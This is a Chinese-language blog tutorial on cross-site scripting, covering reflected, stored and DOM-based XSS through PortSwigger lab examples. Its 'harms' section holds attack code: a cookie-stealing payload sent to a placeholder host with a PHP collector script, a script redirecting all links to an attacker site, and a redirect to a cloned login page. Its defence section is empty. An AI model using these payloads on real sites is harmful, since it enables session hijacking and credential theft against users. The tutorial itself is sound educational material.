<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="1 什么是 XSSXSS, 跨站脚本漏洞，英文全称 Cross Site Script，是一种能够让黑客通过“HTML 注入”篡改网页，向其中插入恶意脚本（一般为 JS 代码），从而在用户浏览网页时，控制用户浏览器的安全威胁，也是一种类型的注入漏洞。 在一开始，利用 XSS 进行攻击的演示案例是跨域的，所以叫做“跨站脚本”，不过现在 JavaScript 的功能日益强大、网站前端也愈发复杂，是否跨">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS基础介绍">
<meta property="og:url" content="https://by-musi.github.io/2023/12/20/XSS%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D/index.html">
<meta property="og:site_name" content="OhMyDarkSpace">
<meta property="og:description" content="1 什么是 XSSXSS, 跨站脚本漏洞，英文全称 Cross Site Script，是一种能够让黑客通过“HTML 注入”篡改网页，向其中插入恶意脚本（一般为 JS 代码），从而在用户浏览网页时，控制用户浏览器的安全威胁，也是一种类型的注入漏洞。 在一开始，利用 XSS 进行攻击的演示案例是跨域的，所以叫做“跨站脚本”，不过现在 JavaScript 的功能日益强大、网站前端也愈发复杂，是否跨">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231127232816.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231126200835.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122232249.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122232332.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231128210656.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231128210637.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122233548.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122233735.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122233822.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231122233857.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231123135504.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231123135020.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231128215413.png">
<meta property="og:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231123135946.png">
<meta property="article:published_time" content="2023-12-19T16:00:00.000Z">
<meta property="article:modified_time" content="2023-12-21T10:47:26.985Z">
<meta property="article:author" content="CaiShao">
<meta property="article:tag" content="web">
<meta property="article:tag" content="owaspTop10">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://by-musi.github.io/images/2023/12/20/Pasted-image-20231127232816.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>XSS基础介绍</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	

  <!-- fancybox -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.css" />
  
<meta name="generator" content="Hexo 7.0.0"><link rel="alternate" href="/atom.xml" title="OhMyDarkSpace" type="application/atom+xml">
<link rel="alternate" href="/rss2.xml" title="OhMyDarkSpace" type="application/rss+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/12/26/PortSwigger_path-traversal_labs/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/12/17/%E8%B7%AF%E5%BE%84%E7%A9%BF%E8%B6%8A%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://by-musi.github.io/2023/12/20/XSS%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D/&title=XSS基础介绍"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AF-XSS"><span class="toc-number">1.</span> <span class="toc-text">1 什么是 XSS</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-XSS-%E5%8E%9F%E7%90%86"><span class="toc-number">2.</span> <span class="toc-text">2 XSS 原理</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS-%E5%8F%91%E7%94%9F%E7%9A%84%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.1.</span> <span class="toc-text">XSS 发生的条件</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-XSS-%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">3 XSS 类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#3-1-Reflected-XSS"><span class="toc-number">3.1.</span> <span class="toc-text">3.1 Reflected XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90"><span class="toc-number">3.1.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-2-Stored-XSS"><span class="toc-number">3.2.</span> <span class="toc-text">3.2 Stored XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90-1"><span class="toc-number">3.2.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-3-DOM-based-XSS"><span class="toc-number">3.3.</span> <span class="toc-text">3.3 DOM-based XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90-2"><span class="toc-number">3.3.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-XSS-%E5%8D%B1%E5%AE%B3"><span class="toc-number">4.</span> <span class="toc-text">4 XSS 危害</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#4-1-%E7%9B%97%E5%8F%96-cookie%EF%BC%8C%E5%8A%AB%E6%8C%81%E4%BC%9A%E8%AF%9D"><span class="toc-number">4.1.</span> <span class="toc-text">4.1 盗取 cookie，劫持会话</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2-%E7%AF%A1%E6%94%B9%E7%BD%91%E9%A1%B5%E9%93%BE%E6%8E%A5"><span class="toc-number">4.2.</span> <span class="toc-text">4.2 篡改网页链接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-3-%E7%9B%97%E5%8F%96%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF"><span class="toc-number">4.3.</span> <span class="toc-text">4.3 盗取用户信息</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-XSS-%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%8F%91%E7%8E%B0"><span class="toc-number">5.</span> <span class="toc-text">5 XSS 测试与发现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#5-1-%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7"><span class="toc-number">5.1.</span> <span class="toc-text">5.1 自动化工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-2-%E6%89%8B%E5%8A%A8%E6%8E%A2%E6%B5%8B"><span class="toc-number">5.2.</span> <span class="toc-text">5.2 手动探测</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-XSS-%E9%98%B2%E5%BE%A1"><span class="toc-number">6.</span> <span class="toc-text">6 XSS 防御</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        XSS基础介绍
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">CaiShao</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-12-19T16:00:00.000Z" class="dt-published" itemprop="datePublished">2023-12-20</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/owaspTop10/" rel="tag">owaspTop10</a>, <a class="p-category" href="/tags/web/" rel="tag">web</a>, <a class="p-category" href="/tags/xss/" rel="tag">xss</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="1-什么是-XSS"><a href="#1-什么是-XSS" class="headerlink" title="1 什么是 XSS"></a>1 什么是 XSS</h1><p>XSS, 跨站脚本漏洞，英文全称 Cross Site Script，是一种能够让黑客通过“<strong>HTML 注入</strong>”篡改网页，向其中插入<strong>恶意脚本</strong>（一般为 JS 代码），从而在用户浏览网页时，控制用户浏览器的安全威胁，也是一种类型的注入漏洞。</p>
<p>在一开始，利用 XSS 进行攻击的演示案例是跨域的，所以叫做“跨站脚本”，不过现在 JavaScript 的功能日益强大、网站前端也愈发复杂，是否跨域也已不重要了。</p>
<h1 id="2-XSS-原理"><a href="#2-XSS-原理" class="headerlink" title="2 XSS 原理"></a>2 XSS 原理</h1><p>原理，或者说过程，如图所示。<br><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231127232816.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231127232816.png"></a></p>
<h2 id="XSS-发生的条件"><a href="#XSS-发生的条件" class="headerlink" title="XSS 发生的条件"></a>XSS 发生的条件</h2><ol>
<li>输入 web 应用程序的数据来自一个不可靠的源，一般是 web 请求。</li>
<li>包含恶意代码数据未经过滤就发送给 Web 用户。</li>
</ol>
<h1 id="3-XSS-类型"><a href="#3-XSS-类型" class="headerlink" title="3 XSS 类型"></a>3 XSS 类型</h1><h2 id="3-1-Reflected-XSS"><a href="#3-1-Reflected-XSS" class="headerlink" title="3.1 Reflected XSS"></a>3.1 Reflected XSS</h2><p>Reflected XSS 即<strong>反射型 XSS</strong>。当应用接收到HTTP请求中的数据，并把数据以一种不安全的方式，如不加任何处理，简单“反射”回浏览器（<strong>the immediate response</strong>）时，就会产生反射型 XSS 漏洞。</p>
<p>Reflected XSS 往往需要用户点击一个恶意链接才能攻击成功，且具有一次性，所以又叫 “<strong>非持久型</strong>” XSS。</p>
<p>Reflected XSS 通常出现在网站的<strong>搜索栏</strong>等地方，且恶意脚本代码通常来自于**当前的 HTTP 请求 (the current HTTP request)**。</p>
<h3 id="举个栗子"><a href="#举个栗子" class="headerlink" title="举个栗子"></a>举个栗子</h3><p>下面以 PortSwigger XSS labs 中的一个<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded">简单例子</a>进行说明。</p>
<p>该 lab 使用 GET 方法通过 search 参数传输数据，且对用户输入的数据不加任何处理就直接输出到页面上。</p>
<p>若用户提交如下数据，“search&#x3D;1655452184”。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url: web-security-academy.net/?search=1655452184</span><br></pre></td></tr></table></figure>

<p>得到的结果如图所示：<br><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231126200835.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231126200835.png"></a></p>
<p>查看页面源码，有：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h1</span>&gt;</span>0 search results for &#x27;1655452184&#x27;<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果输入如下数据：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>&#x27;</span><br></pre></td></tr></table></figure>

<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122232249.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122232249.png"></a></p>
<p>发现 js 脚本 <code>alert(/xss/)</code> 成功执行。</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122232332.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122232332.png"></a></p>
<p>再次查看网页代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h1</span>&gt;</span></span><br><span class="line">	&quot;0 search results for &#x27;&#x27;&quot;</span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">	&quot;&#x27;&#x27;&quot;</span><br><span class="line"><span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">hr</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="3-2-Stored-XSS"><a href="#3-2-Stored-XSS" class="headerlink" title="3.2 Stored XSS"></a>3.2 Stored XSS</h2><p>Stored XSS 即<strong>存储型</strong> XSS，常常出现在<strong>论坛、博客、留言板</strong>等位置，攻击者在发帖过程中嵌入 XSS 攻击代码，帖子被目标服务器存储在数据库中，当用户进行正常访问时，触发恶意代码。所以 Stored XSS 的恶意脚本代码通常来自于<strong>网站服务端的数据库</strong>。</p>
<p>也正是因为恶意代码被存储在服务端数据库中，所以 Stored XSS 不需要用户单击特定 URL 就能执行跨站脚本，且能存在更长时间，又称为“<strong>持久型 XSS</strong>”。</p>
<h3 id="举个栗子-1"><a href="#举个栗子-1" class="headerlink" title="举个栗子"></a>举个栗子</h3><p>下面以 PortSwigger XSS labs 中的一个 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded">lab</a> 进行说明。</p>
<p>用户发布评论时，web 应用使用 POST 方法传输表单数据到服务端。</p>
<p>下图是发布评论时的报文：<br><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231128210656.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231128210656.png"></a><br><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231128210637.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231128210637.png"></a></p>
<p>服务端未对用户评论内容进行处理就存储在了数据库中，当用户访问网页时，数据库中的内容发送到客户端并展示。</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122233548.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122233548.png"></a></p>
<p>在评论中嵌入恶意代码：<code>&lt;script&gt;alert(/xss/)&lt;/script&gt;</code></p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122233735.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122233735.png"></a></p>
<p>由于恶意代码被当作评论存储在了服务端，所以我们不论什么时候访问评论区被嵌入恶意代码的博客，均会触发 XSS (<strong>持久型 XSS</strong>)</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122233822.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122233822.png"></a><br><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231122233857.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231122233857.png"></a></p>
<h2 id="3-3-DOM-based-XSS"><a href="#3-3-DOM-based-XSS" class="headerlink" title="3.3 DOM-based XSS"></a>3.3 DOM-based XSS</h2><p>DOM-based XSS，是通过修改<strong>页面的 DOM 节点</strong>形成的 XSS。当 web 应用从攻击者可控的不受信任的来源中读取数据，并将它传入<strong>动态</strong>修改页面 <strong>DOM 节点</strong>的javascript 语句时就换产生 DOM-based XSS 漏洞。</p>
<p>这些 javascript 语句被称为 <strong>sink</strong>，如 <code>eval()</code>, <code>innerHTML</code>, <code>window.location</code> 等。</p>
<p>以下列出一些可能包含 DOM-XSS 漏洞的 sink。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable language_">document</span>.<span class="title function_">write</span>()</span><br><span class="line"><span class="variable language_">document</span>.<span class="title function_">writeln</span>()</span><br><span class="line"><span class="variable language_">document</span>.<span class="property">domain</span> </span><br><span class="line">element.<span class="property">innerHTML</span> </span><br><span class="line">element.<span class="property">outerHTML</span> </span><br><span class="line">element.<span class="property">insertAdjacentHTML</span> </span><br><span class="line">element.<span class="property">onevent</span></span><br></pre></td></tr></table></figure>

<h3 id="举个栗子-2"><a href="#举个栗子-2" class="headerlink" title="举个栗子"></a>举个栗子</h3><p>以 PortSwigger XSS 实验中的 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink">lab</a> 为例：</p>
<p>用户在搜索栏输入数据，web 应用使用 javascript 代码动态修改页面。</p>
<p>根据题目要求，<code>ctrl+shift+f</code> 全局搜索 <code>location.search</code>。</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231123135504.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231123135504.png"></a></p>
<p>函数 <code>trackSearch()</code> 使用 <code>document.write</code> 在上下两个 section 中写入一个 <code>&lt;img&gt;</code> 标签。<code>location.search</code> 从 url <code>https://0ae0002203c0668a84176d2100500026.web-security-academy.net/?search=1655452184</code>中拿到参数 <code>search</code> 的值并赋值给 <code>query</code>。   GET 方法</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231123135020.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231123135020.png"></a></p>
<p>如果用户输入如下恶意 js 代码： <code>&quot;&gt; &lt;script&gt;alert(/xss/)&lt;/script&gt; &quot;&lt;</code>。</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231128215413.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231128215413.png"></a></p>
<p>用户输入的数据被嵌入当作 html 标签嵌入页面中，恶意代码被执行，触发 xss。</p>
<p><a data-fancybox="gallery" data-src="/images/2023/12/20/Pasted-image-20231123135946.png" data-caption=""><img src="/images/2023/12/20/Pasted-image-20231123135946.png"></a></p>
<h1 id="4-XSS-危害"><a href="#4-XSS-危害" class="headerlink" title="4 XSS 危害"></a>4 XSS 危害</h1><h2 id="4-1-盗取-cookie，劫持会话"><a href="#4-1-盗取-cookie，劫持会话" class="headerlink" title="4.1 盗取 cookie，劫持会话"></a>4.1 盗取 cookie，劫持会话</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?uname=&lt;script&gt;document.location=&quot;http://ip/cookie.php?cookie=&quot; + document.cookie&lt;/script&gt; #</span><br></pre></td></tr></table></figure>

<p>exploit server 的 cookie.php 代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$cookie</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;cookie&#x27;</span>];</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;cookie.txt&#x27;</span>, <span class="variable">$cookie</span>);</span><br></pre></td></tr></table></figure>

<h2 id="4-2-篡改网页链接"><a href="#4-2-篡改网页链接" class="headerlink" title="4.2 篡改网页链接"></a>4.2 篡改网页链接</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>)&#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> link = <span class="variable language_">document</span>.<span class="title function_">getElementsByTagName</span>(<span class="string">&quot;a&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; link.<span class="property">length</span>; j++)&#123;</span></span><br><span class="line"><span class="language-javascript">            link[j].<span class="property">href</span> = <span class="string">&quot;http://attacker-site.com/&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="4-3-盗取用户信息"><a href="#4-3-盗取用户信息" class="headerlink" title="4.3 盗取用户信息"></a>4.3 盗取用户信息</h2><p>思路：<strong>克隆网站登录页面</strong>，利用存储XSS设置跳转代码，如果用户访问，即跳转到克隆网站的登录页面，用户输入登录，账号密码被存储。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">location</span>=<span class="string">&quot;克隆网站ip&quot;</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>如何克隆网站？<br><strong>答：</strong> kali setookit！</p>
</blockquote>
<h1 id="5-XSS-测试与发现"><a href="#5-XSS-测试与发现" class="headerlink" title="5 XSS 测试与发现"></a>5 XSS 测试与发现</h1><h2 id="5-1-自动化工具"><a href="#5-1-自动化工具" class="headerlink" title="5.1 自动化工具"></a>5.1 自动化工具</h2><ol>
<li>Burp Suite scanner</li>
<li><a target="_blank" rel="noopener" href="https://github.com/s0md3v/XSStrike">XSStrike</a></li>
</ol>
<h2 id="5-2-手动探测"><a href="#5-2-手动探测" class="headerlink" title="5.2 手动探测"></a>5.2 手动探测</h2><ol>
<li>构造一个独一无二且不会被识别为恶意代码的字符串用来提交到页面</li>
<li>使用浏览器审查工具进行代码审查，寻找构造的字符串是否在页面中显示，如何显示，构造的字符串在相应标签中的位置（属性还是标签内容）。</li>
</ol>
<p>主要是明确数据流以及网站处理数据的方式。</p>
<h1 id="6-XSS-防御"><a href="#6-XSS-防御" class="headerlink" title="6 XSS 防御"></a>6 XSS 防御</h1><p>不好意思，现在不太 care 防御手段（傲娇</p>

  </div>

  <!-- 版权声明 -->
  
  <ul class="post-copyright">  
    <!-- 版权声明 -->
    <li class="post-copyright-license">
      <strong
        >{{ __('theme.post.copyright.license_title') + __('symbol.colon') }}
      </strong>
      {{ __('theme.post.copyright.license_content', theme.post_copyright.license) }}
    </li>
  </ul>



</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AF-XSS"><span class="toc-number">1.</span> <span class="toc-text">1 什么是 XSS</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-XSS-%E5%8E%9F%E7%90%86"><span class="toc-number">2.</span> <span class="toc-text">2 XSS 原理</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS-%E5%8F%91%E7%94%9F%E7%9A%84%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.1.</span> <span class="toc-text">XSS 发生的条件</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-XSS-%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">3 XSS 类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#3-1-Reflected-XSS"><span class="toc-number">3.1.</span> <span class="toc-text">3.1 Reflected XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90"><span class="toc-number">3.1.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-2-Stored-XSS"><span class="toc-number">3.2.</span> <span class="toc-text">3.2 Stored XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90-1"><span class="toc-number">3.2.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-3-DOM-based-XSS"><span class="toc-number">3.3.</span> <span class="toc-text">3.3 DOM-based XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%B8%AA%E6%A0%97%E5%AD%90-2"><span class="toc-number">3.3.1.</span> <span class="toc-text">举个栗子</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-XSS-%E5%8D%B1%E5%AE%B3"><span class="toc-number">4.</span> <span class="toc-text">4 XSS 危害</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#4-1-%E7%9B%97%E5%8F%96-cookie%EF%BC%8C%E5%8A%AB%E6%8C%81%E4%BC%9A%E8%AF%9D"><span class="toc-number">4.1.</span> <span class="toc-text">4.1 盗取 cookie，劫持会话</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2-%E7%AF%A1%E6%94%B9%E7%BD%91%E9%A1%B5%E9%93%BE%E6%8E%A5"><span class="toc-number">4.2.</span> <span class="toc-text">4.2 篡改网页链接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-3-%E7%9B%97%E5%8F%96%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF"><span class="toc-number">4.3.</span> <span class="toc-text">4.3 盗取用户信息</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-XSS-%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%8F%91%E7%8E%B0"><span class="toc-number">5.</span> <span 